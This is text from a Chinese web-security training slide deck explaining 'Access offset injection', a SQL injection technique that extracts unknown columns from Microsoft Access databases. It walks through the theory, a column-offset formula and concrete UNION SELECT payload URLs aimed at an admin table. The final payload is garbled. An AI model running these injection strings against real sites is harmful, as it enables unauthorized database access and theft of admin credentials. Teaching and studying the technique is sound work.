2018Web攻防训练营Access偏移注入利用www.itjc8.com1.Access偏移注入原理2.Access偏移注入利用场景3.Access偏移注入流程4.Access偏移注入公式实践课程内容www.itjc8.com01Access偏移注入原理www.itjc8.comAccess偏移注入原理借用数据库的自连接查询让数据库内部发生乱序,从而偏移出所需要的字段在我们的页面上显示!运气很重要,不能保证100%成功。www.itjc8.com02Access偏移注入利用场景www.itjc8.comAccess偏移注入利用场景解决知道Access数据库中知道表名,但是得不到字段的sql注入困境。字段名取名复杂,字典暴力破解字段名不成功。www.itjc8.com03Access偏移注入流程www.itjc8.comAccess偏移注入流程1、判断字段数orderby2、判断表名使用unionselect*from表名来获取3、开始偏移注入利用注入公式来注入www.itjc8.com04Access偏移注入公式实践www.itjc8.comAccess偏移注入公式实践偏移注入的基本公式为:orderby出的字段数减去*号的字段数,然而再用orderby的字段数减去2倍刚才得出来的答案也就是18-11=718-7*2=4得到答案等于:4例如:http://xxx.com/test.asp?id=688unionselect1,2,3,4,a.id,b.id,*from(sys_adminasainnerjoinsys_adminasbona.id=b.id)#这里unionselect1,2,3,4:顾名思义就是刚才得出来的长度。#后面的是sql,可作公式。http://192.168.1.110/Production/PRODUCT_DETAIL.asp?id=1513+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+adminhttp://192.168.1.110/Production/PRODUCT_DETAIL.asp?id=1513+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,*+from+admin22-16=622-6*2=10http://192.168.1.110/Production/PRODUCT_DETAIL.asp?id=1513+union+select+1,2,3,4,5,6,7,8,9,10,a.id,b.id,*+from+(diijidibidbid)www.itjc8.com1.Access偏移注入原理2.Access偏移注入利用场景3.Access偏移注入流程4.Access偏移注入公式实践总结www.itjc8.com再见欢迎关注Web安全训练营课程www.itjc8.com
